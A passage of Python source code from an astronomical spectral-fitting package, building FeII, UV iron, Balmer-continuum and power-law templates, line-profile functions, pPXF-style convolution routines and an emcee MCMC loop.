# Sum templates along rows
g_template = np.sum(g_conv_temp, axis=1)
g_template[(lam_gal <4472) & (lam_gal >5147)] = 0
# Z template
# Normalize amplitudes to 1
z_norm = np.array([np.max(z_conv_temp[:,i]) for i in range(np.shape(z_conv_temp)[1])])
z_norm[z_norm<1.e-6] = 1.0
z_conv_temp = z_conv_temp/z_norm
# Multiply by relative intensities
z_conv_temp = z_conv_temp * z_feii_rel_int
# Sum templates along rows
z_template = np.sum(z_conv_temp, axis=1)
# Multiply by FeII amplitude
z_template = z_template * z_feii_amp
z_template[(lam_gal <4418) & (lam_gal >5428)] = 0
#
# fig = plt.figure(figsize=(18,7))
# ax1 = fig.add_subplot(1,1,1)
# ax1.plot(lam_gal,f_template, linewidth=0.5)
# ax1.plot(lam_gal,s_template, linewidth=0.5)
# ax1.plot(lam_gal,g_template, linewidth=0.5)
# ax1.plot(lam_gal,z_template, linewidth=0.5)
# plt.tight_layout()
# sys.exit()
#
elif (opt_feii_options["opt_fwhm_const"]["bool"]==False) | (opt_feii_options["opt_voff_const"]["bool"]==False):
#
# Unpack tables for each template
f_feii_fft, f_feii_center, f_feii_gf, f_feii_e2 = (opt_feii_templates[0], opt_feii_templates[1], opt_feii_templates[2], opt_feii_templates[3])
s_feii_fft, s_feii_center, s_feii_gf, s_feii_e2 = (opt_feii_templates[4], opt_feii_templates[5], opt_feii_templates[6], opt_feii_templates[7])
g_feii_fft, g_feii_center, g_feii_gf, g_feii_e2 = (opt_feii_templates[8], opt_feii_templates[9], opt_feii_templates[10], opt_feii_templates[11])
z_feii_fft, z_feii_rel_int = (opt_feii_templates[12], opt_feii_templates[13])
npad = opt_feii_templates[14]
vsyst = opt_feii_templates[15]
# F-template
# Perform the convolution
f_conv_temp = convolve_gauss_hermite(f_feii_fft, npad, float(velscale),\
[opt_feii_voff, opt_feii_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
# Normalize amplitudes to 1
f_norm = np.array([np.max(f_conv_temp[:,i]) for i in range(np.shape(f_conv_temp)[1])])
f_norm[f_norm<1.e-6] = 1.0
f_conv_temp = f_conv_temp/f_norm
# Calculate temperature dependent relative intensities
f_feii_rel_int = calculate_k10_rel_int("F",f_feii_center, f_feii_gf, f_feii_e2, f_feii_amp, opt_feii_temp)
# Multiply by relative intensities
f_conv_temp = f_conv_temp * f_feii_rel_int
# Sum templates along rows
f_template = np.sum(f_conv_temp, axis=1)
f_template[(lam_gal <4472) & (lam_gal >5147)] = 0
# S-template
# Perform the convolution
s_conv_temp = convolve_gauss_hermite(s_feii_fft, npad, float(velscale),\
[opt_feii_voff, opt_feii_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
# Normalize amplitudes to 1
s_norm = np.array([np.max(s_conv_temp[:,i]) for i in range(np.shape(s_conv_temp)[1])])
s_norm[s_norm<1.e-6] = 1.0
s_conv_temp = s_conv_temp/s_norm
# Calculate temperature dependent relative intensities
s_feii_rel_int = calculate_k10_rel_int("S",s_feii_center, s_feii_gf, s_feii_e2, s_feii_amp, opt_feii_temp)
# Multiply by relative intensities
s_conv_temp = s_conv_temp * s_feii_rel_int
# Sum templates along rows
s_template = np.sum(s_conv_temp, axis=1)
s_template[(lam_gal <4731) & (lam_gal >5285)] = 0
# G-template
# Perform the convolution
g_conv_temp = convolve_gauss_hermite(g_feii_fft, npad, float(velscale),\
[opt_feii_voff, opt_feii_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
# Normalize amplitudes to 1
g_norm = np.array([np.max(g_conv_temp[:,i]) for i in range(np.shape(g_conv_temp)[1])])
g_norm[g_norm<1.e-6] = 1.0
g_conv_temp = g_conv_temp/g_norm
# Calculate temperature dependent relative intensities
g_feii_rel_int = calculate_k10_rel_int("G",g_feii_center, g_feii_gf, g_feii_e2, g_feii_amp, opt_feii_temp)
# Multiply by relative intensities
g_conv_temp = g_conv_temp * g_feii_rel_int
# Sum templates along rows
g_template = np.sum(g_conv_temp, axis=1)
g_template[(lam_gal <4472) & (lam_gal >5147)] = 0
# Z template
# Perform the convolution
z_conv_temp = convolve_gauss_hermite(z_feii_fft, npad, float(velscale),\
[opt_feii_voff, opt_feii_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
# Normalize amplitudes to 1
z_norm = np.array([np.max(z_conv_temp[:,i]) for i in range(np.shape(z_conv_temp)[1])])
z_norm[z_norm<1.e-6] = 1.0
z_conv_temp = z_conv_temp/z_norm
# Multiply by relative intensities
z_conv_temp = z_conv_temp * z_feii_rel_int
# Sum templates along rows
z_template = np.sum(z_conv_temp, axis=1)
# Multiply by FeII amplitude
z_template = z_template * z_feii_amp
z_template[(lam_gal <4418) & (lam_gal >5428)] = 0
return f_template,s_template,g_template,z_template
def calculate_k10_rel_int(transition,center,gf,e2,I2,temp):
"""
Calculate relative intensities for the S, F, and G FeII line groups
from Kovacevic et al. 2010 template as a fucntion a temperature.
"""
c = 2.99792458e+8 # speed of light; m/s
h = 6.62607004e-34 # Planck's constant; m2 kg s-1
k = 1.38064852e-23 # Boltzmann constant; m2 kg s-2 K-1
if (transition=='F'):
# For the F transition, we normalize to the values of 4549.474
rel_int = I2*(4549.474/center)**3 * (gf/1.10e-02) * np.exp(-1.0/(k*temp) * (e2 - 8.896255e-19))
return rel_int
elif (transition=='S'):
# For the S transition, we normalize to the values of 5018.440
rel_int = I2*(5018.440/center)**3 * (gf/3.98e-02) * np.exp(-1.0/(k*temp) * (e2 - 8.589111e-19))
return rel_int
elif (transition=='G'):
# For the G transition, we normalize to the values of 5316.615
rel_int = I2*(5316.615/center)**3 * (gf/1.17e-02) * np.exp(-1.0/(k*temp) * (e2 - 8.786549e-19))
return rel_int
##################################################################################
##################################################################################
def VW01_uv_iron_template(lam_gal, pdict, uv_iron_template, uv_iron_options, velscale, run_dir):
"""
Generates the UV Iron model from Vestergaard & Wilkes (2001).
If the UV iron FWHM and/or VOFF are free to vary, perform the convolution of optical FeII template with Gauss-Hermite kernel using
PPXF framework.
"""
# Unpack opt_feii_templates (uv_iron_fft, npad, vsyst)
uv_iron_fft, npad, vsyst = uv_iron_template
# Parse FeII options
if (uv_iron_options['uv_amp_const']['bool']==False): # if amp not constant
uv_iron_amp = pdict['UV_IRON_AMP']
elif (uv_iron_options['uv_amp_const']['bool']==True): # if amp constant
uv_iron_amp = uv_iron_options['uv_amp_const']['uv_iron_val']
if (uv_iron_options['uv_fwhm_const']['bool']==False): # if amp not constant
uv_iron_fwhm = pdict['UV_IRON_FWHM']
elif (uv_iron_options['uv_fwhm_const']['bool']==True): # if amp constant
uv_iron_fwhm = uv_iron_options['uv_fwhm_const']['uv_iron_val']
if uv_iron_fwhm <= 0.01: uv_iron_fwhm = 0.01
if (uv_iron_options['uv_voff_const']['bool']==False): # if amp not constant
uv_iron_voff = pdict['UV_IRON_VOFF']
elif (uv_iron_options['uv_voff_const']['bool']==True): # if amp constant
uv_iron_voff = uv_iron_options['uv_voff_const']['uv_iron_val']
# Convolve the UV iron FFT template and return the inverse Fourier transform.
conv_temp = convolve_gauss_hermite(uv_iron_fft, npad, velscale,
[uv_iron_voff, uv_iron_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
# Reshape
conv_temp = conv_temp.reshape(-1)
# Re-normalize to 1
conv_temp = conv_temp/np.max(conv_temp)
# Multiplyy by amplitude
template = uv_iron_amp * conv_temp
# Reshape
# template = template.reshape(-1)
#
# Set fitting region outside of template to zero to prevent convolution loops
template[(lam_gal < 1074) & (lam_gal > 3090)] = 0
#
# If the summation results in 0.0, it means that features were too close
# to the edges of the fitting region (usua lly because the region is too
# small), then simply return an array of zeros.
if (isinstance(template,int)) or (isinstance(template,float)):
template=np.zeros(len(lam_gal))
elif np.isnan(np.sum(template)):
template=np.zeros(len(lam_gal))
return template
##################################################################################
##################################################################################
def generate_balmer_continuum(lam_gal,lam_balmer, spec_high_balmer,velscale,
balmer_ratio, balmer_amp, balmer_fwhm, balmer_voff, balmer_Teff, balmer_tau):
# We need to generate a new grid for the Balmer continuum that matches
# that we made for the higher-order lines
def blackbody(lam, balmer_Teff):
c = 2.99792458e+18 # speed of light [A/s]
h = 6.626196e-11 # Planck's constant [g*A2/s2 * s]
k = 1.380649 # Boltzmann Constant [g*A2/s2 1/K]
Blam = ((2.0*h*c**2.0)/lam**5.0)*(1.0/(np.exp((h*c)/(lam*k*balmer_Teff))-1.0))
return Blam
# Construct Balmer continuum from lam_balmer
lam_edge = 3646.0 # Balmer edge wavelength [A]
Blam = blackbody(lam_balmer, balmer_Teff) # blackbody function [erg/s]
cont = Blam * (1.0-1.0/np.exp(balmer_tau*(lam_balmer/lam_edge)**3.0))
# Normalize at 3000 Å
cont = cont / np.max(cont)
# Set Balmer continuum to zero after Balmer edge
cont[find_nearest(lam_balmer,lam_edge)[1]:] = 0.0
# Normalize higher-order lines at Balmer edge
# Unsure of how Calderone et al. (2017) (QSFit) did this normalization, so we added
# fudge factor of 1.36 to match the QSFit implementation of the Balmer continuum.
# spec_high_balmer = spec_high_balmer/spec_high_balmer[find_nearest(lam_balmer,lam_edge+10)[1]] * balmer_ratio #* 1.36
if (np.sum(spec_high_balmer)>0):
spec_high_balmer = spec_high_balmer/np.max(spec_high_balmer) * balmer_ratio #* 1.36
# Sum the two components
full_balmer = spec_high_balmer + cont
# Pre-compute the FFT and vsyst
balmer_fft, balmer_npad = template_rfft(full_balmer)
c = 299792.458 # speed of light in km/s
vsyst = np.log(lam_balmer[0]/lam_gal[0])*c
if balmer_fwhm<= 0.01: balmer_fwhm = 0.01
# Broaden the higher-order Balmer lines
conv_temp = convolve_gauss_hermite(balmer_fft, balmer_npad, float(velscale),\
[balmer_voff, balmer_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
conv_temp = conv_temp/conv_temp[find_nearest(lam_gal,lam_edge)[1]] * balmer_ratio
conv_temp = conv_temp.reshape(-1)
# Normalize the full continuum to 1
# norm_balmer = conv_temp[find_nearest(lam_gal,3000.0)[1]]
# conv_temp = conv_temp/norm_balmer * balmer_amp
conv_temp = conv_temp/np.max(conv_temp) * balmer_amp
# Plot for testing purposes
if 0:
# Plot
fig = plt.figure(figsize=(14,5))
ax1 = fig.add_subplot(1,1,1)
ax1.set_title('Balmer Continuum')
# ax1.plot(lam_balmer, cont/np.max(cont), color='xkcd:cerulean')
# ax1.plot(lam_balmer, spec_high_balmer/np.max(spec_high_balmer), color='xkcd:bright red')
ax1.plot(lam_gal, conv_temp, color='xkcd:bright red',linewidth=0.75)
ax1.axvline(lam_edge,linestyle='--',color='xkcd:red',linewidth=1.0)
ax1.axvline(3000,linestyle='--',color='xkcd:black',linewidth=0.5)
ax1.axhline(1.0,linestyle='--',color='xkcd:black',linewidth=0.5)
# ax1.axhline(0.6,linestyle='--',color='xkcd:black',linewidth=0.5)
ax1.set_ylim(0.0,)
# ax1.set_xlim(1000,4500)
fontsize = 16
ax1.set_xlabel(r"Wavelength ($\lambda$)",fontsize=fontsize)
return conv_temp
##################################################################################
#### Simple Power-Law Template ###################################################
def simple_power_law(x,amp,alpha):
"""
Simple power-low function to model
the AGN continuum (Calderone et al. 2017).
Parameters
----------
x : array_like
wavelength vector (angstroms)
amp : float
continuum amplitude (flux density units)
alpha : float
power-law slope
Returns
----------
C : array
AGN continuum model the same length as x
"""
# This works
xb = np.max(x)-(0.5*(np.max(x)-np.min(x))) # take to be half of the wavelength range
C = amp*(x/xb)**alpha # un-normalized
return C
##################################################################################
#### Smoothly-Broken Power-Law Template ##########################################
def broken_power_law(x, amp, x_break, alpha_1, alpha_2, delta):
"""
Smoothly-broken power law continuum model; for use
when there is sufficient coverage in near-UV.
(See https://docs.astropy.org/en/stable/api/astropy.modeling.
powerlaws.SmoothlyBrokenPowerLaw1D.html#astropy.modeling.powerlaws.
SmoothlyBrokenPowerLaw1D)
Parameters
----------
x : array_like
wavelength vector (angstroms)
amp : float [0,max]
continuum amplitude (flux density units)
x_break : float [x_min,x_max]
wavelength of the break
alpha_1 : float [-4,2]
power-law slope on blue side.
alpha_2 : float [-4,2]
power-law slope on red side.
delta : float [0.001,1.0]
Returns
----------
C : array
AGN continuum model the same length as x
"""
C = amp * (x/x_break)**(alpha_1) * (0.5*(1.0+(x/x_break)**(1.0/delta)))**((alpha_2-alpha_1)*delta)
return C
##################################################################################
##################################################################################
def gaussian_line_profile(lam_gal,center,amp,fwhm,voff,center_pix,fwhm_res_kms,velscale):
"""
Produces a gaussian vector the length of
x with the specified parameters.
"""
# Take into account instrumental dispersion (FWHM resolution)
fwhm = np.sqrt(fwhm**2+fwhm_res_kms**2)
sigma = fwhm/2.3548 # Gaussian dispersion in km/s
sigma_pix = sigma/(velscale) # dispersion in pixels (velscale = km/s/pixel)
if sigma_pix<=0.01: sigma_pix = 0.01
voff_pix = voff/(velscale) # velocity offset in pixels
center_pix = center_pix + voff_pix # shift the line center by voff in pixels
#
x_pix = np.array(range(len(lam_gal))) # pixels vector
x_pix = x_pix.reshape((len(x_pix),1)) # reshape into row
g = amp*np.exp(-0.5*(x_pix-(center_pix))**2/(sigma_pix)**2) # construct gaussian
g = np.sum(g,axis=1)
# Make sure edges of gaussian are zero to avoid wierd things
g[(g>-1e-6) & (g<1e-6)] = 0.0
g[0] = g[1]
g[-1] = g[-2]
#
return g
##################################################################################
def lorentzian_line_profile(lam_gal,center,amp,fwhm,voff,center_pix,fwhm_res_kms,velscale,noise):
"""
Produces a lorentzian vector the length of
x with the specified parameters.
(See: https://docs.astropy.org/en/stable/api/astropy.modeling.functional_models.Lorentz1D.html)
"""
# Take into account instrumental dispersion (FWHM resolution)
fwhm = np.sqrt(fwhm**2+fwhm_res_kms**2)
fwhm_pix = fwhm/velscale # fwhm in pixels (velscale = km/s/pixel)
if fwhm_pix<=0.01: fwhm_pix = 0.01
voff_pix = voff/velscale # velocity offset in pixels
center_pix = center_pix + voff_pix # shift the line center by voff in pixels
#
x_pix = np.array(range(len(lam_gal))) # pixels vector
x_pix = x_pix.reshape((len(x_pix),1)) # reshape into row
gamma = 0.5*fwhm_pix
l = amp*( (gamma**2) / (gamma**2+(x_pix-center_pix)**2) ) # construct lorenzian
l= np.sum(l,axis=1)
# Truncate wings below noise level
l[l<=np.median(noise)] = 0.0
l[l>np.median(noise)] -= np.median(noise)
# Make sure edges of gaussian are zero to avoid wierd things
l[(l>-1e-6) & (l<1e-6)] = 0.0
l[0] = l[1]
l[-1] = l[-2]
#
return l
##################################################################################
def gauss_hermite_line_profile(lam_gal,center,amp,fwhm,voff,hmoments,center_pix,fwhm_res_kms,velscale,noise):
"""
Produces a Gauss-Hermite vector the length of
x with the specified parameters.
"""
# Take into account instrumental dispersion (FWHM resolution)
fwhm = np.sqrt(fwhm**2+fwhm_res_kms**2)
sigma_pix = fwhm/2.3548/velscale # dispersion in pixels (velscale = km/s/pixel)
if sigma_pix<=0.01: sigma_pix = 0.01
voff_pix = voff/velscale # velocity offset in pixels
center_pix = center_pix + voff_pix # shift the line center by voff in pixels
#
x_pix = np.array(range(len(lam_gal))) # pixels vector
x_pix = x_pix.reshape((len(x_pix),1)) #- center_pix
# Taken from Riffel 2010 - profit: a new alternative for emission-line profile fitting
w = (x_pix-center_pix)/sigma_pix
alpha = 1.0/np.sqrt(2.0)*np.exp(-w**2/2.0)
if hmoments is not None:
mom = len(hmoments)+2
n = np.arange(3, mom + 1)
nrm = np.sqrt(special.factorial(n)*2**n) # Normalization
coeff = np.append([1, 0, 0],hmoments/nrm)
h = hermite.hermval(w,coeff)
g = (amp*alpha)/sigma_pix*h
elif hmoments is None:
coeff = np.array([1, 0, 0])
h = hermite.hermval(w,coeff)
g = (amp*alpha)/sigma_pix*h
g = np.sum(g,axis=1)
# We ensure any values of the line profile that are negative
# are zeroed out (See Van der Marel 1993)
g[g<0] = 0.0
# Normalize to 1
g = g/np.max(g)
# Apply amplitude
g = amp*g
# Truncate wings below noise level
g[g<=np.median(noise)] = 0.0
g[g>np.median(noise)] -= np.median(noise)
# Replace the ends with the same value
g[(g>-1e-6) & (g<1e-6)] = 0.0
g[0] = g[1]
g[-1] = g[-2]
#
return g
##################################################################################
def voigt_line_profile(lam_gal,center,amp,fwhm,voff,shape,center_pix,fwhm_res_kms,velscale,noise):
"""
Pseudo-Voigt profile implementation from:
https://docs.mantidproject.org/nightly/fitting/fitfunctions/PseudoVoigt.html
"""
# Take into account instrumental dispersion (FWHM resolution)
fwhm = np.sqrt(fwhm**2+fwhm_res_kms**2)
fwhm_pix = fwhm/velscale # fwhm in pixels (velscale = km/s/pixel)
if fwhm_pix<=0.01: fwhm_pix = 0.01
sigma_pix = fwhm_pix/2.3548
if sigma_pix<=0.01: sigma_pix = 0.01
voff_pix = voff/velscale # velocity offset in pixels
center_pix = center_pix + voff_pix # shift the line center by voff in pixels
#
x_pix = np.array(range(len(lam_gal))) # pixels vector
x_pix = x_pix.reshape((len(x_pix),1)) # reshape into row
# Gaussian contribution
a_G = 1.0/(sigma_pix * np.sqrt(2.0*np.pi))
g = a_G * np.exp(-0.5*(x_pix-(center_pix))**2/(sigma_pix)**2)
g = np.sum(g,axis=1)
# Lorentzian contribution
l = (1.0/np.pi) * (fwhm_pix/2.0)/((x_pix-center_pix)**2 + (fwhm_pix/2.0)**2)
l = np.sum(l,axis=1)
# Intensity
# I = amp/((float(shape)*a_G) + ((1.0-float(shape))*(2.0/(np.pi*fwhm_pix))))
# Voigt profile
pv = (float(shape) * g) + ((1.0-float(shape))*l)
# Normalize and multiply by amplitude
pv = pv/np.max(pv)*amp
# Truncate wings below noise level
pv[pv<=np.median(noise)] = 0.0
pv[pv>np.median(noise)] -= np.median(noise)
# Replace the ends with the same value
pv[(pv>-1e-6) & (pv<1e-6)] = 0.0
pv[0] = pv[1]
pv[-1] = pv[-2]
return pv
##################################################################################
# pPXF Routines (from Cappellari 2017)
# NAME:
# GAUSSIAN_FILTER1D
#
# MODIFICATION HISTORY:
# V1.0.0: Written as a replacement for the Scipy routine with the same name,
# to be used with variable sigma per pixel. MC, Oxford, 10 October 2015
def gaussian_filter1d(spec, sig):
"""
Convolve a spectrum by a Gaussian with different sigma for every pixel.
If all sigma are the same this routine produces the same output as
scipy.ndimage.gaussian_filter1d, except for the border treatment.
Here the first/last p pixels are filled with zeros.
When creating a template library for SDSS data, this implementation
is 60x faster than a naive for loop over pixels.
:param spec: vector with the spectrum to convolve
:param sig: vector of sigma values (in pixels) for every pixel
:return: spec convolved with a Gaussian with dispersion sig
"""
if isinstance(sig,(int,float)):
sig = np.full_like(spec,float(sig))
sig = sig.clip(0.01) # forces zero sigmas to have 0.01 pixels
p = int(np.ceil(np.max(3*sig)))
m = 2*p + 1 # kernel size
x2 = np.linspace(-p, p, m)**2
n = spec.size
a = np.zeros((m, n))
for j in range(m): # Loop over the small size of the kernel
a[j, p:-p] = spec[j:n-m+j+1]
gau = np.exp(-x2[:, None]/(2*sig**2))
gau /= np.sum(gau, 0)[None, :] # Normalize kernel
conv_spectrum = np.sum(a*gau, 0)
return conv_spectrum
##################################################################################
def log_rebin(lamRange, spec, oversample=1, velscale=None, flux=False):
"""
Logarithmically rebin a spectrum, while rigorously conserving the flux.
Basically the photons in the spectrum are simply redistributed according
to a new grid of pixels, with non-uniform size in the spectral direction.
When the flux keyword is set, this program performs an exact integration
of the original spectrum, assumed to be a step function within the
linearly-spaced pixels, onto the new logarithmically-spaced pixels.
The output was tested to agree with the analytic solution.
:param lamRange: two elements vector containing the central wavelength
of the first and last pixels in the spectrum, which is assumed
to have constant wavelength scale! E.g. from the values in the
standard FITS keywords: LAMRANGE = CRVAL1 + [0, CDELT1*(NAXIS1 - 1)].
It must be LAMRANGE[0] < LAMRANGE[1].
:param spec: input spectrum.
:param oversample: can be used, not to loose spectral resolution,
especally for extended wavelength ranges and to avoid aliasing.
Default: OVERSAMPLE=1 ==> Same number of output pixels as input.
:param velscale: velocity scale in km/s per pixels. If this variable is
not defined, then it will contain in output the velocity scale.
If this variable is defined by the user it will be used
to set the output number of pixels and wavelength scale.
:param flux: (boolean) True to preserve total flux. In this case the
log rebinning changes the pixels flux in proportion to their
dLam so the following command will show large differences
beween the spectral shape before and after LOG_REBIN:
plt.plot(exp(logLam), specNew) # Plot log-rebinned spectrum
plt.plot(np.linspace(lamRange[0], lamRange[1], spec.size), spec)
By defaul, when this is False, the above two lines produce
two spectra that almost perfectly overlap each other.
:return: [specNew, logLam, velscale] where logLam is the natural
logarithm of the wavelength and velscale is in km/s.
"""
lamRange = np.asarray(lamRange)
assert len(lamRange) == 2, 'lamRange must contain two elements'
assert lamRange[0] < lamRange[1], 'It must be lamRange[0] < lamRange[1]'
assert spec.ndim == 1, 'input spectrum must be a vector'
n = spec.shape[0]
m = int(n*oversample)
dLam = np.diff(lamRange)/(n - 1.) # Assume constant dLam
lim = lamRange/dLam + [-0.5, 0.5] # All in units of dLam
borders = np.linspace(*lim, num=n+1) # Linearly
logLim = np.log(lim)
c = 299792.458 # Speed of light in km/s
if velscale is None: # Velocity scale is set by user
velscale = np.diff(logLim)/m*c # Only for output
else:
logScale = velscale/c
m = int(np.diff(logLim)/logScale) # Number of output pixels
logLim[1] = logLim[0] + m*logScale
newBorders = np.exp(np.linspace(*logLim, num=m+1)) # Logarithmically
k = (newBorders - lim[0]).clip(0, n-1).astype(int)
specNew = np.add.reduceat(spec, k)[:-1] # Do analytic integral
specNew *= np.diff(k) > 0 # fix for design flaw of reduceat()
specNew += np.diff((newBorders - borders[k])*spec[k])
if not flux:
specNew /= np.diff(newBorders)
# Output log(wavelength): log of geometric mean
logLam = np.log(np.sqrt(newBorders[1:]*newBorders[:-1])*dLam)
return specNew, logLam, velscale
###############################################################################
def rebin(x, factor):
"""
Rebin a vector, or the first dimension of an array,
by averaging within groups of "factor" adjacent values.
"""
if factor == 1:
xx = x
else:
xx = x.reshape(len(x)//factor, factor, -1).mean(1).squeeze()
return xx
###############################################################################
def template_rfft(templates):
npix_temp = templates.shape[0]
templates = templates.reshape(npix_temp, -1)
npad = fftpack.next_fast_len(npix_temp)
templates_rfft = np.fft.rfft(templates, npad, axis=0)
return templates_rfft,npad
##################################################################################
def convolve_gauss_hermite(templates_rfft,npad, velscale, start, npix,
velscale_ratio=1, sigma_diff=0, vsyst=0):
"""
Convolve a spectrum, or a set of spectra, arranged into columns of an array,
with a LOSVD parametrized by the Gauss-Hermite series.
This is intended to reproduce what pPXF does for the convolution and it
uses the analytic Fourier Transform of the LOSVD introduced in
Cappellari (2017) http://adsabs.harvard.edu/abs/2017MNRAS.466..798C
EXAMPLE:
...
pp = ppxf(templates, galaxy, noise, velscale, start,
degree=4, mdegree=4, velscale_ratio=ratio, vsyst=dv)
spec = convolve_gauss_hermite(templates, velscale, pp.sol, galaxy.size,
velscale_ratio=ratio, vsyst=dv)
# The spectrum below is equal to pp.bestfit to machine precision
spectrum = (spec @ pp.weights)*pp.mpoly + pp.apoly
:param spectra: log rebinned spectra
:param velscale: velocity scale c*dLogLam in km/s
:param start: parameters of the LOSVD [vel, sig, h3, h4,...]
:param npix: number of output pixels
:return: vector or array with convolved spectra
"""
# npix_temp = templates.shape[0]
# templates = templates.reshape(npix_temp, -1)
start = np.array(start,dtype=float) # make copy
start[:2] /= velscale
vsyst /= velscale
# npad = fftpack.next_fast_len(npix_temp)
# templates_rfft = np.fft.rfft(templates, npad, axis=0)
lvd_rfft = losvd_rfft(start, 1, start.shape, templates_rfft.shape[0],
1, vsyst, velscale_ratio, sigma_diff)
conv_temp = np.fft.irfft(templates_rfft*lvd_rfft[:, 0], npad, axis=0)
conv_temp = rebin(conv_temp[:npix*velscale_ratio, :], velscale_ratio)
return conv_temp
##################################################################################
def losvd_rfft(pars, nspec, moments, nl, ncomp, vsyst, factor, sigma_diff):
"""
Analytic Fourier Transform (of real input) of the Gauss-Hermite LOSVD.
Equation (38) of Cappellari M., 2017, MNRAS, 466, 798
http://adsabs.harvard.edu/abs/2017MNRAS.466..798C
"""
losvd_rfft = np.empty((nl, ncomp, nspec), dtype=complex)
p = 0
for j, mom in enumerate(moments): # loop over kinematic components
for k in range(nspec): # nspec=2 for two-sided fitting, otherwise nspec=1
s = 1 if k == 0 else -1 # s=+1 for left spectrum, s=-1 for right one
vel, sig = vsyst + s*pars[0 + p], pars[1 + p]
a, b = [vel, sigma_diff]/sig
w = np.linspace(0, np.pi*factor*sig, nl)
losvd_rfft[:, j, k] = np.exp(1j*a*w - 0.5*(1 + b**2)*w**2)
if mom > 2:
n = np.arange(3, mom + 1)
nrm = np.sqrt(special.factorial(n)*2**n) # Normalization
coeff = np.append([1, 0, 0], (s*1j)**n * pars[p - 1 + n]/nrm)
poly = hermite.hermval(w, coeff)
losvd_rfft[:, j, k] *= poly
p += mom
return np.conj(losvd_rfft)
##################################################################################
def nnls(A,b,npoly=0):
"""
Non-negative least squares.
A nobel prize shall be awarded to whomever makes this
way faster, because it is the choke point of the entire code.
"""
m, n = A.shape
AA = np.hstack([A, -A[:, :npoly]])
x = optimize.nnls(AA, b)[0]
x[:npoly] -= x[n:]
return np.array(x[:n])
####################################################################################
def run_emcee(pos,ndim,nwalkers,run_dir,lnprob_args,init_params,param_names,
auto_stop,conv_type,min_samp,ncor_times,autocorr_tol,write_iter,write_thresh,burn_in,min_iter,max_iter,
verbose=True):
"""
Runs MCMC using emcee on all final parameters and checks for autocorrelation convergence
every write_iter iterations.
"""
# Keep original burn_in and max_iter to reset convergence if jumps out of convergence
orig_burn_in = burn_in
orig_max_iter = max_iter
# Sorted parameter names
param_names = np.array(param_names)
i_sort = np.argsort(param_names) # this array gives the ordered indices of parameter names (alphabetical)
# Create MCMC_chain.csv if it doesn't exist
chain_file = run_dir.joinpath('log', 'MCMC_chain.csv')
if not chain_file.exists():
with chain_file.open(mode='w') as f:
param_string = ', '.join(str(e) for e in param_names)
f.write('# iter, ' + param_string) # Write initial parameters
best_str = ', '.join(str(e) for e in init_params)
f.write('\n 0, '+best_str)
# initialize the sampler
dtype = [('fluxes',dict),('eqwidths',dict),('cont_fluxes',dict),("int_vel_disp",dict),('log_like',float)] # mcmc blobs
sampler = emcee.EnsembleSampler(nwalkers, ndim, lnprob, args=lnprob_args,blobs_dtype=dtype) # blobs_dtype=dtype added for Python2 -> Python3
start_time = time.time() # start timer
write_log((ndim,nwalkers,auto_stop,conv_type,burn_in,write_iter,write_thresh,min_iter,max_iter),'emcee_options',run_dir)
# Initialize stuff for autocorrelation analysis
if (auto_stop==True):
autocorr_times_all = [] # storage array for autocorrelation times
autocorr_tols_all = [] # storage array for autocorrelation tolerances
old_tau = np.full(len(param_names),np.inf)
min_samp = min_samp # minimum iterations to use past convergence
ncor_times = ncor_times # multiplicative tolerance; number of correlation times before which we stop sampling
autocorr_tol = autocorr_tol
stop_iter = max_iter # stopping iteration; changes once convergence is reached
converged = False
# write_log((min_samp,autocorr_tol,ncor_times,conv_type),'autocorr_options',run_dir)
# If one provides a list of parameters for autocorrelation, it needs to be in the
# form of a tuple. If one only provides one paraemeter, it needs to be converted to a tuple:
if (auto_stop==True) and (conv_type != 'all') and (conv_type != 'mean') and (conv_type != 'median'):
if not isinstance(conv_type, tuple):
conv_type = (conv_type,) #
# Check auto_stop convergence type:
if (auto_stop==True) and (isinstance(conv_type,tuple)==True) :
if all(elem in param_names for elem in conv_type)==True:
if (verbose):
print('\n Only considering convergence of following parameters: ')
for c in conv_type:
print(' %s' % c)
pass
# check to see that all param_names are in conv_type, if not, remove them
# from conv_type
else:
try:
conv_type_list = list(conv_type)
for c in conv_type:
if c not in param_names:
conv_type_list.remove(c)
conv_type = tuple(conv_type_list)
if all(elem in conv_type for elem in param_names)==True:
if (verbose):
print('\n Only considering convergence of following parameters: ')
for c in conv_type:
print(' %s' % c)
pass
else:
if (verbose):
print('\n One of more parameters in conv_type is not a valid parameter. Defaulting to median convergence type../.\n')
conv_type='median'
except:
print('\n One of more parameters in conv_type is not a valid parameter. Defaulting to median convergence type../.\n')
conv_type='median'
if (auto_stop==True):
write_log((min_samp,autocorr_tol,ncor_times,conv_type),'autocorr_options',run_dir)
# Run emcee
for k, result in enumerate(sampler.sample(pos, iterations=max_iter)):
if ((k+1) % write_iter == 0) and verbose:
print("MCMC iteration: %d" % (k+1))
best = [] # For storing current chain positions (median of parameter values at write_iter iterations)
if ((k+1) % write_iter == 0) and ((k+1)>=write_thresh): # Write every [write_iter] iteration
# Chain location for each parameter
# Median of last 100 positions for each walker.
nwalkers = np.shape(sampler.chain)[0]
npar = np.shape(sampler.chain)[2]
sampler_chain = sampler.chain[:,:k+1,:]
new_sampler_chain = []
for i in range(0,np.shape(sampler_chain)[2],1):
pflat = sampler_chain[:,:,i] # flattened along parameter
flat = np.concatenate(np.stack(pflat,axis=1),axis=0)
new_sampler_chain.append(flat)
# best = []
for pp in range(0,npar,1):
data = new_sampler_chain[pp][-int(nwalkers*write_iter):]
med = np.median(data)
best.append(med)
# write to file
with run_dir.joinpath('log', 'MCMC_chain.csv').open(mode='a') as f:
best_str = ', '.join(str(e) for e in best)
f.write('\n'+str(k+1)+', '+best_str)
# Checking autocorrelation times for convergence
if ((k+1) % write_iter == 0) and ((k+1)>=min_iter) and ((k+1)>=write_thresh) and (auto_stop==True):
# Autocorrelation analysis of chain to determine convergence; the minimum autocorrelation time is 1.0, which results when a time cannot be accurately calculated.
tau = autocorr_convergence(sampler.chain,param_names,plot=False) # Calculate autocorrelation times for each parameter
autocorr_times_all.append(tau) # append tau to storage array
# Calculate tolerances
